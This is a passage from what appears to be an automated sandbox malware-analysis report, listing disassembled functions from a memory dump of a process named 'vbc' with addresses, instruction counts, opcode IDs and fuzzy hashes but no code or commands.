                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                      • Instruction ID: 87f84c1322f497f4a5bc035f3daa27f16c7b8e3e06f97af0e37ceed7aa3a3454
                                                      • Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                      • Instruction Fuzzy Hash: B5719035A04A1A9BCF20CF64C582ABEBBB6BF04752F95419EEC41EB240E735DD418B90
                                                      Function 0583D090 Relevance: .2, Instructions: 217COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                      • Instruction ID: de93b7f5b3348d95cde5cfff38a5c9c3c0068d6fd3e338a74c796589d6cac91a
                                                      • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                      • Instruction Fuzzy Hash: 62819B72E0521D9BDF14DF68C881BADFBB6FB84344F1985AADC16E7340D631AE408B91
                                                      Function 0582C640 Relevance: .2, Instructions: 206COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1887d6e6316d2a0f97df1bf5911aa960657311f71e3e03a9fbd355f54d8add3a
                                                      • Instruction ID: 77f8cab1e5bbac99ca28e949b0320966c4be92e16f87c91514e7dbe35259a8d0
                                                      • Opcode Fuzzy Hash: 1887d6e6316d2a0f97df1bf5911aa960657311f71e3e03a9fbd355f54d8add3a
                                                      • Instruction Fuzzy Hash: 60718775909229EFCB25CF59C894ABEBFB6FB48710F14451AEC52EB250E7309D40CBA0
                                                      Function 0582260B Relevance: .2, Instructions: 201COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0a500d6593f3ff143e03441b5c629f52038304980b57168c30a8ea4e67b6c127
                                                      • Instruction ID: 84ee6884984467829b627095a945f657aab43f1f90c0fee0b112cd963317392b
                                                      • Opcode Fuzzy Hash: 0a500d6593f3ff143e03441b5c629f52038304980b57168c30a8ea4e67b6c127
                                                      • Instruction Fuzzy Hash: E7718E767086519FD311DF28C484B6ABBE6FF84214F0485AAEC9ACB351DB34DC86CB91
                                                      Function 058D903E Relevance: .2, Instructions: 186COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1cfc76659034c7263fac1d0ae835d2d3c89eaa79135fe25e58956b2a2acd9391
                                                      • Instruction ID: ba1fd5feb2873b4779a0d6a6cbe1a7ceab6651d941986e1c0b69320ea9eebcf7
                                                      • Opcode Fuzzy Hash: 1cfc76659034c7263fac1d0ae835d2d3c89eaa79135fe25e58956b2a2acd9391
                                                      • Instruction Fuzzy Hash: 3161A971204715ABD715DF69C888BABFBE9BB88714F004619FC69C7240DB34AD05CBA2
                                                      Function 0583BD30 Relevance: .2, Instructions: 182COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 65647462bb8ab98dfeac4f62974f1fa7fbeec33637d62df85611afb0cda06d86
                                                      • Instruction ID: fdb9672516eced30c2101589e21241141b84bc3d4a8e3f5ff874b735ccac23fe
                                                      • Opcode Fuzzy Hash: 65647462bb8ab98dfeac4f62974f1fa7fbeec33637d62df85611afb0cda06d86
                                                      • Instruction Fuzzy Hash: 227135B5E012099FCB14CFA9C541BACBBFABF48354F1980AAE855E7391D734AD41CB90
                                                      Function 05817703 Relevance: .2, Instructions: 179COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8d523c6e1c4ebe31bcaa17d12756670619b444636bf431877320d17d4c0bb545
                                                      • Instruction ID: f5ff6bda9ea25a604198787cd8ce064ed28de9fe9c8f1764db315c2152661c26
                                                      • Opcode Fuzzy Hash: 8d523c6e1c4ebe31bcaa17d12756670619b444636bf431877320d17d4c0bb545
                                                      • Instruction Fuzzy Hash: 2A614D75A04606AFDB18DF68C484AADFBBAFF48204F14856EDC1AE7340DB34AD41CB94
                                                      Function 0584B570 Relevance: .2, Instructions: 161COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 53344eae0e2a2d28b388c93a80ba81ef83ceed74d855f4590e040c5fa7263bf9
                                                      • Instruction ID: 5fe7c6c47073ab9eca021be7c3cadfe51bdbb04f3ce299caaf46adbc981e118f
                                                      • Opcode Fuzzy Hash: 53344eae0e2a2d28b388c93a80ba81ef83ceed74d855f4590e040c5fa7263bf9
                                                      • Instruction Fuzzy Hash: 175191712093449FD720EF28CD85F6A7BA8EB85764F10062DFD16D7191DB319C41CBA2
                                                      Function 058395DA Relevance: .2, Instructions: 160COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7a902c4b1b5fdeb423dcbd69a0341bbaf7489b83fbef5ffaa598eb2f693b6dcb
                                                      • Instruction ID: d019b235961dea1dcaadc33376056b22d0255b3e522b04413781e5910a2f0088
                                                      • Opcode Fuzzy Hash: 7a902c4b1b5fdeb423dcbd69a0341bbaf7489b83fbef5ffaa598eb2f693b6dcb
                                                      • Instruction Fuzzy Hash: C151AE71A0130CABEB219FA8CC85BADBBB9FF45300F20442AED95E7151EBB19C449F51
                                                      Function 05823740 Relevance: .2, Instructions: 159COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8ed6520e873f18420321c83dbb4cbe63697f195efa62a910393bd4e8fb9dfd14
                                                      • Instruction ID: cf6b0e39e0e3ce0c2de190a89c26280ea4437eb6de6056ee94ab00dbe36e6877
                                                      • Opcode Fuzzy Hash: 8ed6520e873f18420321c83dbb4cbe63697f195efa62a910393bd4e8fb9dfd14
                                                      • Instruction Fuzzy Hash: FC51CD75A1466AAFC711CF68C491A69BBB1FF04710B058A69EC45DF740EB38ED91CB80
                                                      Function 0584E443 Relevance: .2, Instructions: 158COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 64973cfb59869989f4c4a7f1bd02bc976bf7cfba67df7d1243e952ef290c708d
                                                      • Instruction ID: 0bf10ccca2fe454a19d88790bac764eebfef9bef8c7220cb4f3dcfd8b1c8544e
                                                      • Opcode Fuzzy Hash: 64973cfb59869989f4c4a7f1bd02bc976bf7cfba67df7d1243e952ef290c708d
                                                      • Instruction Fuzzy Hash: 18516B71200A18DFCB21EF68C994E6AB7BEFF08654F510869ED56C7660DB34ED40CB52
                                                      Function 05817152 Relevance: .2, Instructions: 158COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 414684df46b89a6b974b032c58cb81a4b00d5620809228c43dae33e4a2ecbec6
                                                      • Instruction ID: 553c9d24fd3ba5ea741c220a10ba91f401ad8751d62b205fb739a9d9e4a79a07
                                                      • Opcode Fuzzy Hash: 414684df46b89a6b974b032c58cb81a4b00d5620809228c43dae33e4a2ecbec6
                                                      • Instruction Fuzzy Hash: 4651AA31A04609EFEB15EB68C948BBDBBBAFF04359F104069EC12D7690EB749D01CB85
                                                      Function 058345B1 Relevance: .2, Instructions: 156COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                      • Instruction ID: 4f4f3926d6e483882562bdf3b278bdb8205f6402d4a5a0bfd712aaf72dfbc710
                                                      • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                      • Instruction Fuzzy Hash: B2517971E0821EABCF15DF98C449BAEBBBAAF45754F044069EE01EB250E734DD448BE4
                                                      Function 058151ED Relevance: .1, Instructions: 149COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8d477af0a4b0cf3dea22eb2b80d31f39104faf7a40eae63782f43a78b03d5884
                                                      • Instruction ID: c05eadfb1b5f80be54f2a5a4d54fdc495373aeb00eb37c115db60842b951069c
                                                      • Opcode Fuzzy Hash: 8d477af0a4b0cf3dea22eb2b80d31f39104faf7a40eae63782f43a78b03d5884
                                                      • Instruction Fuzzy Hash: 2D518C31B15318DFDF21DAA8D848BADB7BABB85758F000018DC06EB240D7B5AD408F69
                                                      Function 0584F71F Relevance: .1, Instructions: 143COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 45753d72351bfe1d1ca3da8b3849be471285a4c34438019779af869f6d6016b7
                                                      • Instruction ID: f2f1ed1a4252e46a6c18938f4ed0501305cae64a32cd8770fc343f901e700fe7
                                                      • Opcode Fuzzy Hash: 45753d72351bfe1d1ca3da8b3849be471285a4c34438019779af869f6d6016b7
                                                      • Instruction Fuzzy Hash: 2B418476E0562DABDB11EBA88884ABFB7BDAF04654F050166ED01F7300DA38DD40CBE1
                                                      Function 058E35D7 Relevance: .1, Instructions: 139COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                      • Instruction ID: e57bd8f09b9a644422166cf75383693dfd463ca5ebe839e9b91d13381669ae22
                                                      • Opcode Fuzzy Hash: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                      • Instruction Fuzzy Hash: 86516D71200606EFCB15CF54C980A66BBB6FF46308F1585BAE808DF222E771ED85CB90
                                                      Function 0584A430 Relevance: .1, Instructions: 139COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 090a5d925608857c1d287f2b4b09d1f98b047ce43756aea9363a93376e49a8b9
                                                      • Instruction ID: 6775306ba1415e8ad2ed5d59182e35608abd28555aef7ad125bd6b6a5e0a2ce2
                                                      • Opcode Fuzzy Hash: 090a5d925608857c1d287f2b4b09d1f98b047ce43756aea9363a93376e49a8b9
                                                      • Instruction Fuzzy Hash: F441D3717883489FCB19EE6D9986F7A3B66EB44714F01182DFD42EB241EB719C00CB51
                                                      Function 0581D534 Relevance: .1, Instructions: 138COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c3cbab8c9b804168e8f96370714f8ddf008a0daadd68de2a3a47f9059cdaf989
                                                      • Instruction ID: d955073806017db448b7601f32bf7e6aa8eabbc7cadc211b80cd7d386c43d3cc
                                                      • Opcode Fuzzy Hash: c3cbab8c9b804168e8f96370714f8ddf008a0daadd68de2a3a47f9059cdaf989
                                                      • Instruction Fuzzy Hash: 6C51AC32309A998FC726CB18C444F6A73AABB44794F0909A5FC16CB6A1DB38DC40D766
                                                      Function 058401F8 Relevance: .1, Instructions: 138COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d4fa0e6058477b67d45c39cf2a1d76726e9edc489adae3f638bbaffbd4fd09ad
                                                      • Instruction ID: 5aa95af351028a7caf30816828438539b1cce879e3908fdacf499caf424a6bd5
                                                      • Opcode Fuzzy Hash: d4fa0e6058477b67d45c39cf2a1d76726e9edc489adae3f638bbaffbd4fd09ad
                                                      • Instruction Fuzzy Hash: FE41AD35A0022CDBCB15DF98C448AEEB7B5FF48714F14811AED1AEB240D739AC41CBA5
                                                      Function 05852750 Relevance: .1, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                      • Instruction ID: 5209039bff650bc6195604773acfbdd59e208a1337bb622241e0fb948ff114df
                                                      • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                      • Instruction Fuzzy Hash: 80513A75A006158FCB18DF58C580ABDF7B6FF84724F1481AAD816E7390D734AE41CB90
                                                      Function 05816154 Relevance: .1, Instructions: 133COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3d3f0938ac47abc6e8009b938749122899c0b2d3be8d42aa2d125f5285a70ccc
                                                      • Instruction ID: 799d73aa98771aa833f37e6b8612a838c0a7376cb8339991bd5eb45e1fc7ec9c
                                                      • Opcode Fuzzy Hash: 3d3f0938ac47abc6e8009b938749122899c0b2d3be8d42aa2d125f5285a70ccc
                                                      • Instruction Fuzzy Hash: 6C51C570A0421ADBDB25DB28CC04BB97BB6BF01314F1482A9DC69DB6D1EB349D81CF45
                                                      Function 0580B136 Relevance: .1, Instructions: 131COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 860a7db1c1ef5577a1afefc5c986dcd0e919c9d0de77abbdbbbc85ea93c6ae3c
                                                      • Instruction ID: 870b5a97496a2093be126de7babf037b0409f1b659e2cfca9cf8b775bb02e151
                                                      • Opcode Fuzzy Hash: 860a7db1c1ef5577a1afefc5c986dcd0e919c9d0de77abbdbbbc85ea93c6ae3c
                                                      • Instruction Fuzzy Hash: EE417AB1680705EFCB22EF68C885B2ABBA9FB00794F009429ED95DB290D770DC40CB91
                                                      Function 058D866E Relevance: .1, Instructions: 129COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                      • Instruction ID: 9077a1a3505cee1109d59cd175c3c4e6e6484d3238bc4dcaae08d8f7c4f438e3
                                                      • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                      • Instruction Fuzzy Hash: 90418F75B04209ABDB15DB99C888ABFFBFABF88750F144069EC05E7345DA70DD018BA0
                                                      Function 0583A470 Relevance: .1, Instructions: 127COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8ae6edb2af2031ffbe61a43eac446f8a4777c18fbc762c90d9314e5b6fe3c8f6
                                                      • Instruction ID: 536621a6788323ed9576e4402284bacc978d15bf400ce73ffe7112e01b980d8f
                                                      • Opcode Fuzzy Hash: 8ae6edb2af2031ffbe61a43eac446f8a4777c18fbc762c90d9314e5b6fe3c8f6
                                                      • Instruction Fuzzy Hash: BA41BF31A08218CFCF18EFA8C4967A97BB5BF48314F040595E956EB290DB35DD40CBE1
                                                      Function 0583D6E0 Relevance: .1, Instructions: 126COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 876e1f10d0567d8413f7073a0371ba1f45d136acb55f069674e5d3c1a31c5ad1
                                                      • Instruction ID: 6fc6de134257cde2c376b7c61c6671ba60fad314dec933de93381c9a1ac7cc36
                                                      • Opcode Fuzzy Hash: 876e1f10d0567d8413f7073a0371ba1f45d136acb55f069674e5d3c1a31c5ad1
                                                      • Instruction Fuzzy Hash: 62419E752193049FD720EF69C995E6A7BA9EB85760F01492DFE19C7290CB30EC11CBE2
                                                      Function 0580A020 Relevance: .1, Instructions: 122COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                      • Instruction ID: 5e80bee2fee4955b4b06712672abe56a91c71b68427933d3fc33f3472dd929ca
                                                      • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                      • Instruction Fuzzy Hash: 42414C31B0431ADFDB68EF188844BBBB772FB5071AF15806AEC46DB291D6318D80CB91
                                                      Function 05840710 Relevance: .1, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                      • Instruction ID: 829f30e03ca293496e11a1b388744dabff70918dcc9d7d75f66b52ac12681b71
                                                      • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                      • Instruction Fuzzy Hash: 57411775A04709EFDB24CF98C984AABB7F5FB08704B10496DEA56DB650E330AE44CF51
                                                      Function 0581262C Relevance: .1, Instructions: 119COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: faa4564e4c95fbb35dc3ed04ecb09c6cb467219e33fb11253235b3f1d588a63f
                                                      • Instruction ID: a0246b204f6b94f772cc09599946425e2d7cf43d4fac4a7f51106322089b54cf
                                                      • Opcode Fuzzy Hash: faa4564e4c95fbb35dc3ed04ecb09c6cb467219e33fb11253235b3f1d588a63f
                                                      • Instruction Fuzzy Hash: E4419A75601704CFCB21EF29D944A6ABBBAFF44314F108AA9CC17DB6A0EB309D41CB46
                                                      Function 058905A7 Relevance: .1, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f9369b94f4850f25af01da7ecf37ebe010f8c6690d4fe45c69fe39309ed9793c
                                                      • Instruction ID: ff7864c8cedffff3d2539302ec9067352d4f1b5df2226a8aa29f144d692b4a1d
                                                      • Opcode Fuzzy Hash: f9369b94f4850f25af01da7ecf37ebe010f8c6690d4fe45c69fe39309ed9793c
                                                      • Instruction Fuzzy Hash: FD41AE72608785DBC725DF69C844A6AB7E9BFC8700F080A29FC95D7680E730ED04C7A6
                                                      Function 05815702 Relevance: .1, Instructions: 104COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a49bc378c57aebf30a7a7d8f1c6911abae07f9cf7a54d1eb9b130a7b87d8f6de
                                                      • Instruction ID: 03eb844168efffd60fc56f3dc3b75a9c462b50005493d26b1fd58be57338632e
                                                      • Opcode Fuzzy Hash: a49bc378c57aebf30a7a7d8f1c6911abae07f9cf7a54d1eb9b130a7b87d8f6de
                                                      • Instruction Fuzzy Hash: 46318B31301A0AEFCB519B64CA85EA9BBAABF84258F405425ED01C7A50DB70EC20CFD5
                                                      Function 058350E4 Relevance: .1, Instructions: 101COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                      • Instruction ID: 8af4ebde51a8252f7cb4b1da1cd22376a0f0b8654d8a7b41e70c2d80ef2c302f
                                                      • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                      • Instruction Fuzzy Hash: FC31F7317083459BD721EA18C801B6BB7E6BB85754F48852AFC85CB390E378CC41C7D2
                                                      Function 0580B480 Relevance: .1, Instructions: 100COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ea696189b788392f50736162309987333a7a2c282bb33e20d719766426de547c
                                                      • Instruction ID: 557be9429d79fef540588374a06afbcfba8f05df9a3c41fe1046c6e645b31845
                                                      • Opcode Fuzzy Hash: ea696189b788392f50736162309987333a7a2c282bb33e20d719766426de547c
                                                      • Instruction Fuzzy Hash: 9F312172600604AFC761EF18C880E6A7BAAFF84764F1456A9FC45CB291DB31ED42CBD0
                                                      Function 058D61C3 Relevance: .1, Instructions: 97COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
